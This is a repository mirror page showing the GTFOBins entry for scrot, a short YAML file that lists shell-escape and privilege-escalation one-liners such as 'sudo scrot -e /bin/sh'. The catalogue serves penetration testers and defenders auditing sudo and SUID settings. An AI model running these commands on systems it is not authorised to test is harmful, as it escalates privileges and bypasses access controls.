1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/scrot.md
Miguel R 887384bc2f
Add scrot
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-07-02 12:52:03 +02:00

11 lines
193 B
Markdown

---
description: This requires a running X server.
functions:
shell:
- code: scrot -e /bin/sh
limited-suid:
- code: ./scrot -e /bin/sh
sudo:
- code: sudo scrot -e /bin/sh
---